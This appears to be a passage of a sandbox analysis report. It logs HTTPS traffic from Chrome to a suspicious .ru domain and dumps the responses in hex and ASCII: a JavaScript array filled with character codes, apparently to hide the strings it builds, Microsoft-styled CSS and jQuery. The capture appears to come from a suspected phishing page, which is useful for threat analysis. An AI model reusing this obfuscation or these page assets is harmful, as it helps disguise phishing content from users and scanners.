                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 35 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 39 36 5d 20 3d 20 31 31 34 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 39 37 5d 20 3d 20 35 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 39 38 5d 20 3d 20 35 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 33 39 39 5d 20 3d 20 31 31 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 30 5d 20 3d 20 31 32 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 31 5d 20 3d 20 33 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 32 5d 20 3d 20 31 31 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 33 5d 20 3d 20 31 31 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 34 5d 20 3d 20 31 30 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 35 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 30 36 5d 20 3d 20
                                                                                                                                                                                    Data Ascii: 5] = 101;tOogzgJVoR[396] = 114;tOogzgJVoR[397] = 58;tOogzgJVoR[398] = 50;tOogzgJVoR[399] = 112;tOogzgJVoR[400] = 120;tOogzgJVoR[401] = 32;tOogzgJVoR[402] = 115;tOogzgJVoR[403] = 111;tOogzgJVoR[404] = 108;tOogzgJVoR[405] = 105;tOogzgJVoR[406] =
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 6f 67 7a 67 4a 56 6f 52 5b 34 35 36 5d 20 3d 20 31 30 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 35 37 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 35 38 5d 20 3d 20 31 31 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 35 39 5d 20 3d 20 31 30 33 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 30 5d 20 3d 20 34 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 31 5d 20 3d 20 39 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 32 5d 20 3d 20 31 31 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 33 5d 20 3d 20 31 32 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 34 5d 20 3d 20 35 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 35 5d 20 3d 20 31 31 36 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 34 36 36 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a
                                                                                                                                                                                    Data Ascii: ogzgJVoR[456] = 100;tOogzgJVoR[457] = 105;tOogzgJVoR[458] = 110;tOogzgJVoR[459] = 103;tOogzgJVoR[460] = 45;tOogzgJVoR[461] = 98;tOogzgJVoR[462] = 111;tOogzgJVoR[463] = 120;tOogzgJVoR[464] = 59;tOogzgJVoR[465] = 116;tOogzgJVoR[466] = 101;tOogzgJ
                                                                                                                                                                                    2024-01-26 13:42:22 UTC1369INData Raw: 56 6f 52 5b 35 31 36 5d 20 3d 20 31 30 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 31 37 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 31 38 5d 20 3d 20 35 39 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 31 39 5d 20 3d 20 31 32 32 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 30 5d 20 3d 20 34 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 31 5d 20 3d 20 31 30 35 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 32 5d 20 3d 20 31 31 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 33 5d 20 3d 20 31 30 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 34 5d 20 3d 20 31 30 31 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 35 5d 20 3d 20 31 32 30 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35 32 36 5d 20 3d 20 35 38 3b 0a 74 4f 6f 67 7a 67 4a 56 6f 52 5b 35
                                                                                                                                                                                    Data Ascii: VoR[516] = 108;tOogzgJVoR[517] = 101;tOogzgJVoR[518] = 59;tOogzgJVoR[519] = 122;tOogzgJVoR[520] = 45;tOogzgJVoR[521] = 105;tOogzgJVoR[522] = 110;tOogzgJVoR[523] = 100;tOogzgJVoR[524] = 101;tOogzgJVoR[525] = 120;tOogzgJVoR[526] = 58;tOogzgJVoR[5


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    75192.168.2.1649830104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:23 UTC722OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6qTbSZFQpomlh5Jo/1emrd6kgjeh HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:23 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:23 GMT
                                                                                                                                                                                    Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BJz09yVFDhaMKgQrmsQ6OGw4YIOc5j2VnRfEH8rkxVhkp5eDezK6WbRL%2FagOsFDeaiyWS0bd%2B%2F8zLbg7ndw8mbtNGw88IlHRLZGgR0ChUk8zWezrmdI2h1fYdIQ9Pqg4CS7h%2BJyWj%2B2x1QspnJ0gT1CGffs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dcc5b0e12d5-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:23 UTC636INData Raw: 37 63 64 32 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                                                                                                                                                    Data Ascii: 7cd2html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b
                                                                                                                                                                                    Data Ascii: ;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 3a 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69
                                                                                                                                                                                    Data Ascii: ;box-sizing:border-box}:before,:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline:5px auto -webki
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74
                                                                                                                                                                                    Data Ascii: tion:none}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.t
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65
                                                                                                                                                                                    Data Ascii: {white-space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.te
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 61 78 6c 69 6e 65 73 2d 34 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d
                                                                                                                                                                                    Data Ascii: axlines-4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e
                                                                                                                                                                                    Data Ascii: te-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 65 69 67 68 74 3a 34 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77
                                                                                                                                                                                    Data Ascii: eight:40.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69
                                                                                                                                                                                    Data Ascii: splay:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-ri
                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63
                                                                                                                                                                                    Data Ascii: .col-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.c


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    76192.168.2.1649829104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:23 UTC706OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6hrZFScQzDHfHo/7DKiMCzMdg1 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:24 UTC736INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:23 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fpi7PZyf69qJa4jE4lfujZzWk5VR7hLHbuFvaDVBJJU7vz8NOnx58STEqnHuc29FIzhfl0dK%2FuCHnSxLp4MiSZND8rEWEC%2FOSaMsgXlArr8WLLg8ufeC4fe0zIfbi0ClCJJiXjm64xCt36qRRD%2B2BFiDAbw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dcc6c4b0721-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:24 UTC633INData Raw: 37 63 63 66 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22
                                                                                                                                                                                    Data Ascii: 7ccf/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("
                                                                                                                                                                                    2024-01-26 13:42:24 UTC1369INData Raw: 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 3d 3d 3d 74 2e 77 69 6e 64 6f 77 7d 2c 76 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 3d 28 74 3d 74 7c 7c 72 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 6e 29 66 6f 72 28 69 20 69 6e 20 76 29 6e 5b 69 5d 26 26 28 6f 5b 69 5d 3d 6e 5b 69 5d 29 3b 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74
